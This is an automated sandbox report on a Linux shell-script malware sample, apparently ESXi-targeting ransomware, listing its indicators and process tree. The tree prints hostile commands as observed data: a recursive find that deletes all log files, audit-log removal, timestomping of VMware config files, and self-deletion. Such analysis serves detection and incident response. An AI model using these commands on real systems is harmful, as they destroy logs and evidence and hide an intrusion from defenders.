78276bd481a04c29109fbbd8313701e5b814165fa4b48515ec4489ccfda93107

Resubmissions

15-03-2024 16:07

240315-tkykeacf7z 1

25-02-2024 14:29

240225-rtjrhaee9z 10

Analysis

max time kernel
5s
max time network
1677s
platform
ubuntu-20.04_amd64
resource
ubuntu2004-amd64-20240221-en
resource tags

arch:amd64arch:i386image:ubuntu2004-amd64-20240221-enkernel:5.4.0-169-genericlocale:en-usos:ubuntu-20.04-amd64system
submitted
25-02-2024 14:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

script_malware/10c3b6b03a9bf105d264a8e7f30dcab0a6c59a414529b0af0a6bd9f1d2984459.sh
Size

3KB
MD5

d0d36f169f1458806053aae482af5010
SHA1

e603944aceb5c0885a8627de12f36b159bbf2f05
SHA256

10c3b6b03a9bf105d264a8e7f30dcab0a6c59a414529b0af0a6bd9f1d2984459
SHA512

982abe39731d8cc852c25650740ff73975c10d19027eccf610401260e2f508334f1de656f8dd332fa698dccc9f7d3bda610c8b9e84d276036a6e9408d826229a

Score

7^/10

evasion

Malware Config

Signatures

Deletes Audit logs 1 TTPs 1 IoCs
Deletes logs related to the Linux Audit framework.
evasion

Indicator Removal
T1070

Processes:

rm

description ioc process

File deleted /var/log/audit/audit.log rm

description	ioc	process
File deleted	/var/log/audit/audit.log	rm

Deletes log files 1 TTPs 11 IoCs

Deletes log files on the system.

Indicator Removal

T1070

Processes:

rmrmrmrmrmrmrmrmrmrmrm

description	ioc	process
File deleted	/var/log/apt/history.log	rm
File deleted	/var/log/apt/term.log	rm
File deleted	/var/log/unattended-upgrades/unattended-upgrades-shutdown.log	rm
File deleted	/var/log/Xorg.0.log	rm
File deleted	/var/log/fontconfig.log	rm
File deleted	/var/log/gpu-manager.log	rm
File deleted	/var/log/dpkg.log	rm
File deleted	/var/log/ubuntu-advantage.log	rm
File deleted	/var/log/auth.log	rm
File deleted	/var/log/kern.log	rm
File deleted	/var/log/alternatives.log	rm

Enumerates running processes
Discovers information about currently running processes on the system

Reads CPU attributes 1 TTPs 17 IoCs

System Information Discovery

T1082

Processes:

findpsps

description	ioc	process
File opened for reading	/sys/devices/system/cpu/cpu0/hotplug	find
File opened for reading	/sys/devices/system/cpu/cpuidle	find
File opened for reading	/sys/devices/system/cpu/hotplug	find
File opened for reading	/sys/devices/system/cpu/power	find
File opened for reading	/sys/devices/system/cpu/vulnerabilities	find
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index2	find
File opened for reading	/sys/devices/system/cpu/cpu0/topology	find
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index0	find
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/cpu0	find
File opened for reading	/sys/devices/system/cpu/cpu0/power	find
File opened for reading	/sys/devices/system/cpu/cpu0/cache	find
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index3	find
File opened for reading	/sys/devices/system/cpu/cpu0/cache/index1	find
File opened for reading	/sys/devices/system/cpu/online	ps
File opened for reading	/sys/devices/system/cpu/smt	find
File opened for reading	/sys/devices/system/cpu/cpufreq	find

Reads hardware information 1 TTPs 1 IoCs
Accesses system info like serial numbers, manufacturer names etc.

System Information Discovery
T1082

Processes:

find

description ioc process

File opened for reading /sys/devices/virtual/dmi/id/power find

description	ioc	process
File opened for reading	/sys/devices/virtual/dmi/id/power	find

Reads network interface configuration 2 TTPs 12 IoCs

Fetches information about one or more active network interfaces.

System Network Configuration Discovery

T1016

System Network Connections Discovery

T1049

Processes:

find

description	ioc	process
File opened for reading	/sys/devices/pci0000:00/0000:00:03.0/net/ens3/queues/rx-0	find
File opened for reading	/sys/devices/virtual/net/lo/queues/tx-0	find
File opened for reading	/sys/devices/virtual/net/lo/queues/tx-0/byte_queue_limits	find
File opened for reading	/sys/devices/virtual/net/lo/queues/rx-0	find
File opened for reading	/sys/devices/pci0000:00/0000:00:03.0/net/ens3/queues/tx-0/byte_queue_limits	find
File opened for reading	/sys/devices/pci0000:00/0000:00:03.0/net/ens3/power	find
File opened for reading	/sys/devices/pci0000:00/0000:00:03.0/net/ens3/queues	find
File opened for reading	/sys/devices/pci0000:00/0000:00:03.0/net/ens3/queues/tx-0	find
File opened for reading	/sys/devices/virtual/net/lo/statistics	find
File opened for reading	/sys/devices/virtual/net/lo/power	find
File opened for reading	/sys/devices/virtual/net/lo/queues	find
File opened for reading	/sys/devices/pci0000:00/0000:00:03.0/net/ens3/statistics	find

Enumerates kernel/hardware configuration 1 TTPs 64 IoCs

Reads contents of /sys virtual filesystem to enumerate system information.

System Information Discovery

T1082

Processes:

find

description	ioc	process
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_exit_fork	find
File opened for reading	/sys/fs/cgroup/unified/system.slice/apt-daily.service	find
File opened for reading	/sys/module/haltpoll/parameters	find
File opened for reading	/sys/fs/cgroup/pids/system.slice/kerneloops.service	find
File opened for reading	/sys/kernel/tracing/events/syscalls/sys_exit_fcntl	find
File opened for reading	/sys/kernel/slab/:A-0000192/cgroup/cred_jar(859:evolution-calendar-factory.service)	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_enter_getsid	find
File opened for reading	/sys/kernel/debug/tracing/events/bpf_test_run/bpf_test_finish	find
File opened for reading	/sys/kernel/tracing/events/syscalls/sys_exit_getsockopt	find
File opened for reading	/sys/kernel/slab/kmalloc-32/cgroup/kmalloc-32(839:NetworkManager.service)	find
File opened for reading	/sys/kernel/slab/:0000640	find
File opened for reading	/sys/bus/i2c/drivers/da9063	find
File opened for reading	/sys/kernel/slab/:A-0000064/cgroup/anon_vma_chain(739:whoopsie.service)	find
File opened for reading	/sys/kernel/slab/:A-0000704/cgroup/files_cache(1067:gnome-terminal-server.service)	find
File opened for reading	/sys/bus/container/devices	find
File opened for reading	/sys/kernel/tracing/events/compaction/mm_compaction_wakeup_kcompactd	find
File opened for reading	/sys/kernel/debug/tracing/events/irq_vectors/irq_work_exit	find
File opened for reading	/sys/devices/virtual/misc/rfkill/power	find
File opened for reading	/sys/devices/virtual/vc/vcsu6	find
File opened for reading	/sys/kernel/slab/kmalloc-1k/cgroup/kmalloc-1k(1141:fwupd.service)	find
File opened for reading	/sys/kernel/slab/:A-0000080/cgroup/task_delay_info(991:gsd-screensaver-proxy.service)	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_exit_openat	find
File opened for reading	/sys/devices/virtual/misc/fuse/power	find
File opened for reading	/sys/kernel/tracing/events/syscalls/sys_enter_execve	find
File opened for reading	/sys/kernel/slab/:0002632/cgroup	find
File opened for reading	/sys/kernel/slab/sock_inode_cache/cgroup/sock_inode_cache(59:dev-hugepages.mount)	find
File opened for reading	/sys/devices/virtual/block/loop1/trace	find
File opened for reading	/sys/kernel/tracing/events/syscalls/sys_exit_setsid	find
File opened for reading	/sys/kernel/slab/radix_tree_node/cgroup/radix_tree_node(139:[email protected])	find
File opened for reading	/sys/kernel/slab/kmalloc-32/cgroup/kmalloc-32(979:gsd-print-notifications.service)	find
File opened for reading	/sys/kernel/debug/block/loop3	find
File opened for reading	/sys/fs/cgroup/unified/system.slice/cups.service	find
File opened for reading	/sys/kernel/tracing/events/neigh/neigh_update_done	find
File opened for reading	/sys/kernel/slab/:A-0000064/cgroup/anon_vma_chain(1141:fwupd.service)	find
File opened for reading	/sys/kernel/debug/tracing/events/xhci-hcd/xhci_queue_trb	find
File opened for reading	/sys/kernel/debug/dri	find
File opened for reading	/sys/kernel/debug/tracing/events/gpio/gpio_direction	find
File opened for reading	/sys/kernel/debug/bdi/252:0	find
File opened for reading	/sys/module/sysfillrect/holders	find
File opened for reading	/sys/fs/cgroup/systemd/system.slice/esm-cache.service	find
File opened for reading	/sys/bus/parport/drivers	find
File opened for reading	/sys/kernel/slab/kmalloc-64	find
File opened for reading	/sys/kernel/slab/kmalloc-4k/cgroup/kmalloc-4k(233:sys-kernel-config.mount)	find
File opened for reading	/sys/devices/pci0000:00/0000:00:04.0/ata4/host3/target3:0:0/3:0:0:0/scsi_device/3:0:0:0/power	find
File opened for reading	/sys/devices/virtual/tty/tty12/power	find
File opened for reading	/sys/kernel/slab/mm_struct/cgroup/mm_struct(75:sys-kernel-debug.mount)	find
File opened for reading	/sys/kernel/slab/kmalloc-32/cgroup/kmalloc-32(767:dbus.service)	find
File opened for reading	/sys/kernel/slab/kmalloc-512/cgroup/kmalloc-512(1015:gsd-usb-protection.service)	find
File opened for reading	/sys/kernel/tracing/events/jbd2/jbd2_commit_locking	find
File opened for reading	/sys/kernel/debug/tracing/events/vmscan/mm_vmscan_lru_shrink_inactive	find
File opened for reading	/sys/devices/virtual/block/loop7/queue	find
File opened for reading	/sys/kernel/debug/tracing/events/mpx/mpx_unmap_zap	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_enter_chroot	find
File opened for reading	/sys/fs/cgroup/memory/system.slice/upower.service	find
File opened for reading	/sys/bus/clockevents	find
File opened for reading	/sys/kernel/slab/:A-0000208/cgroup/vm_area_struct(833:gnome-shell-x11.service)	find
File opened for reading	/sys/kernel/slab/dma-kmalloc-2k	find
File opened for reading	/sys/kernel/debug/tracing/events/jbd2/jbd2_end_commit	find
File opened for reading	/sys/kernel/tracing/events/jbd2	find
File opened for reading	/sys/kernel/debug/tracing/events/rseq/rseq_ip_fixup	find
File opened for reading	/sys/kernel/debug/tracing/events/syscalls/sys_exit_mprotect	find
File opened for reading	/sys/kernel/slab/mm_struct/cgroup/mm_struct(593:cups-browsed.service)	find
File opened for reading	/sys/kernel/slab/:A-0000080/cgroup/task_delay_info(865:evolution-addressbook-factory.service)	find
File opened for reading	/sys/kernel/slab/:A-0000040/cgroup	find

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

Processes:

findpsps

description	ioc	process
File opened for reading	/proc/93/attr	find
File opened for reading	/proc/670/task/670/fd	find
File opened for reading	/proc/859/map_files	find
File opened for reading	/proc/967/attr/apparmor	find
File opened for reading	/proc/74/attr	find
File opened for reading	/proc/1096/task/1098/fdinfo	find
File opened for reading	/proc/635/task/651/net/netfilter	find
File opened for reading	/proc/997/task/1003/net/dev_snmp6	find
File opened for reading	/proc/1257/stat	ps
File opened for reading	/proc/635/net/netfilter	find
File opened for reading	/proc/802/task/802/fdinfo	find
File opened for reading	/proc/829/task/848	find
File opened for reading	/proc/904/status	ps
File opened for reading	/proc/88/task/88/attr/apparmor	find
File opened for reading	/proc/972/task/999/attr	find
File opened for reading	/proc/498/task/502/net/netfilter	find
File opened for reading	/proc/1474/task/1474/net/netfilter	find
File opened for reading	/proc/972/ns	find
File opened for reading	/proc/1081/task/1135/net/netfilter	find
File opened for reading	/proc/93/status	ps
File opened for reading	/proc/16/task/16/net/netfilter	find
File opened for reading	/proc/452/task/452/fdinfo	find
File opened for reading	/proc/804/task/819	find
File opened for reading	/proc/1046/task/1047	find
File opened for reading	/proc/1428/stat	ps
File opened for reading	/proc/77/fdinfo	find
File opened for reading	/proc/579/task/582/attr/apparmor	find
File opened for reading	/proc/617/task/617/fd	find
File opened for reading	/proc/954/task/971/ns	find
File opened for reading	/proc/829/task/839/attr	find
File opened for reading	/proc/1424/fdinfo	find
File opened for reading	/proc/1399/task/1403/attr/smack	find
File opened for reading	/proc/166/net	find
File opened for reading	/proc/484	find
File opened for reading	/proc/635/task/651/net	find
File opened for reading	/proc/854/task/854/net/netfilter	find
File opened for reading	/proc/1425/fdinfo	find
File opened for reading	/proc/159/status	ps
File opened for reading	/proc/16/task/16/net	find
File opened for reading	/proc/795/fdinfo	find
File opened for reading	/proc/1029/task/1029/attr/smack	find
File opened for reading	/proc/1042/task/1043/fd	find
File opened for reading	/proc/78/stat	ps
File opened for reading	/proc/90/task	find
File opened for reading	/proc/866/net/netfilter	find
File opened for reading	/proc/489/task/524/attr/apparmor	find
File opened for reading	/proc/674/task/675/net	find
File opened for reading	/proc/1046/task/1048/net/stat	find
File opened for reading	/proc/1082/status	ps
File opened for reading	/proc/8/ns	find
File opened for reading	/proc/1416/net/stat	find
File opened for reading	/proc/1474/task/1474/net	find
File opened for reading	/proc/535/attr	find
File opened for reading	/proc/1128/task/1128/attr	find
File opened for reading	/proc/1145/task/1167/net/dev_snmp6	find
File opened for reading	/proc/785/status	ps
File opened for reading	/proc/1174/map_files	find
File opened for reading	/proc/6/task/6/attr	find
File opened for reading	/proc/954/task/959/attr/smack	find
File opened for reading	/proc/954/net/stat	find
File opened for reading	/proc/992/task/993/net/dev_snmp6	find
File opened for reading	/proc/498/task/1566/attr/apparmor	find
File opened for reading	/proc/1079/task/1141/net/stat	find
File opened for reading	/proc/1257	find

/tmp/script_malware/10c3b6b03a9bf105d264a8e7f30dcab0a6c59a414529b0af0a6bd9f1d2984459.sh
/tmp/script_malware/10c3b6b03a9bf105d264a8e7f30dcab0a6c59a414529b0af0a6bd9f1d2984459.sh
1⤵
PID:1488
- /usr/bin/chmod
  chmod +x /tmp//encrypt
  2⤵
  PID:1499
- /usr/bin/find
  find /usr/lib/vmware -type f -name index.html
  2⤵
  PID:1504
- /usr/bin/mv
  mv /etc/motd /etc/motd1
  2⤵
  PID:1505
- /bin/find
  /bin/find / -name "*.log" -exec /bin/rm -rf "{}" ";"
  2⤵
  - Reads CPU attributes
  - Reads hardware information
  - Reads network interface configuration
  - Enumerates kernel/hardware configuration
  - Reads runtime system information
  PID:1506
- - /bin/rm
    /bin/rm -rf /var/lib/gdm3/.local/share/gvfs-metadata/root-17e68493.log
    3⤵
    PID:1507
- - /bin/rm
    /bin/rm -rf /var/log/auth.log
    3⤵
    - Deletes log files
    PID:1511
- - /bin/rm
    /bin/rm -rf /var/log/kern.log
    3⤵
    - Deletes log files
    PID:1512
- - /bin/rm
    /bin/rm -rf /var/log/fontconfig.log
    3⤵
    - Deletes log files
    PID:1513
- - /bin/rm
    /bin/rm -rf /var/log/gpu-manager.log
    3⤵
    - Deletes log files
    PID:1514
- - /bin/rm
    /bin/rm -rf /var/log/audit/audit.log
    3⤵
    - Deletes Audit logs
    PID:1515
- - /bin/rm
    /bin/rm -rf /var/log/dpkg.log
    3⤵
    - Deletes log files
    PID:1516
- - /bin/rm
    /bin/rm -rf /var/log/ubuntu-advantage.log
    3⤵
    - Deletes log files
    PID:1517
- - /bin/rm
    /bin/rm -rf /var/log/apt/history.log
    3⤵
    - Deletes log files
    PID:1518
- - /bin/rm
    /bin/rm -rf /var/log/apt/term.log
    3⤵
    - Deletes log files
    PID:1519
- - /bin/rm
    /bin/rm -rf /var/log/unattended-upgrades/unattended-upgrades-shutdown.log
    3⤵
    - Deletes log files
    PID:1520
- - /bin/rm
    /bin/rm -rf /var/log/alternatives.log
    3⤵
    - Deletes log files
    PID:1521
- - /bin/rm
    /bin/rm -rf /var/log/Xorg.0.log
    3⤵
    - Deletes log files
    PID:1522
- - /bin/rm
    /bin/rm -rf /root/.local/share/gvfs-metadata/home-d4da85ea.log
    3⤵
    PID:1569
- - /bin/rm
    /bin/rm -rf /root/.local/share/gvfs-metadata/trash:-e5043e0b.log
    3⤵
    PID:1570
- - /bin/rm
    /bin/rm -rf /root/.local/share/gvfs-metadata/root-7ac72d14.log
    3⤵
    PID:1571
- - /bin/rm
    /bin/rm -rf /run/initramfs/fsck.log
    3⤵
    PID:1572
- /bin/rm
  /bin/rm -f /store/packages/vmtools.py
  2⤵
  PID:1708
- /bin/touch
  /bin/touch -r /etc/vmware/rhttpproxy/config.xml /etc/vmware/rhttpproxy/endpoints.conf
  2⤵
  PID:1709
- /bin/touch
  /bin/touch -r /etc/vmware/rhttpproxy/config.xml /bin/hostd-probe.sh
  2⤵
  PID:1710
- /bin/touch
  /bin/touch -r /etc/vmware/rhttpproxy/config.xml /etc/rc.local.d/local.sh
  2⤵
  PID:1711
- /bin/rm
  /bin/rm -f /tmp/encrypt /tmp/nohup.out /tmp/index.html /tmp/motd /tmp/public.pem /tmp/archieve.zip
  2⤵
  PID:1712
- /bin/sh
  /bin/sh /bin/auto-backup.sh
  2⤵
  PID:1713
- /bin/rm
  /bin/rm -- /tmp/script_malware/10c3b6b03a9bf105d264a8e7f30dcab0a6c59a414529b0af0a6bd9f1d2984459.sh
  2⤵
  PID:1714
- /etc/init.d/SSH
  /etc/init.d/SSH start
  2⤵
  PID:1715

/usr/bin/grep
grep "Config File"
1⤵
PID:1493

/usr/bin/awk
awk "{print \$3}"
1⤵
PID:1494

/usr/bin/awk
awk "{print \$2}"
1⤵
PID:1498

/usr/bin/grep
grep vmx
1⤵
PID:1497

/usr/bin/ps
ps
1⤵
- Reads CPU attributes
- Reads runtime system information
PID:1496

/usr/bin/awk
awk "-F " "{print \$2}"
1⤵
PID:1503

/usr/bin/grep
grep /vmfs/volumes/
1⤵
PID:1502

/bin/wc
/bin/wc -l
1⤵
PID:1703

/bin/grep
/bin/grep -v grep
1⤵
PID:1702

/bin/grep
/bin/grep encrypt
1⤵
PID:1701

/bin/ps
/bin/ps
1⤵
- Reads CPU attributes
- Reads runtime system information
PID:1700

/bin/wc
/bin/wc -l
1⤵
PID:1707

/bin/grep
/bin/grep " 7."
1⤵
PID:1706

/bin/vmware
/bin/vmware -l
1⤵
PID:1705

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

T1070

Credential Access

Discovery

System Information Discovery

T1082

System Network Configuration Discovery

T1016

System Network Connections Discovery

T1049

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads